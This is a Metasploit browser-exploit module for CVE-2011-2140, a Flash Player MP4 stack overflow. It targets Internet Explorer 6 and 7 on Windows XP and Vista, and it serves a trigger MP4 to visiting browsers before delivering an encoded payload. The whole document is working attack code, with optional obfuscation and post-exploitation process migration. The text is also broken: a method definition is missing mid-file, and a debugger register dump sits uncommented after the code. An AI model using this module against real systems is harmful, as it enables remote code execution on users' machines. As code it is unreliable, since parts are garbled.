class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
component. When processing a MP4 file (specifically the Sequence Parameter Set),
Flash will see if pic_order_cnt_type is equal to 1, which sets the
num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
offset_for_ref_frame on the stack, which allows arbitrary remote code execution
under the context of the user. Numerous reports also indicate that this
vulnerability has been exploited in the wild.
Please note that the exploit requires a SWF media player in order to trigger
the bug, which currently isn't included in the framework. However, software such
as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', #RCA
'Abysssec', #PoC
'sinn3r' #Metasploit
],
'References' =>
[
[ 'CVE', '2011-2140' ],
[ 'BID', '49083' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
[ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
[ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
[ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'ExitFunction' => "seh",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on
[ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 9 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1]
elsif agent =~ /MSIE 7/
return targets[2]
else
return nil
end
end
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return
end
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
#print_error("Sorry, not sending you the mp4 for now")
#send_not_found(cli)
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
return
end
# Set payload depending on target
p = payload.encoded
ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ?? ???
Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf
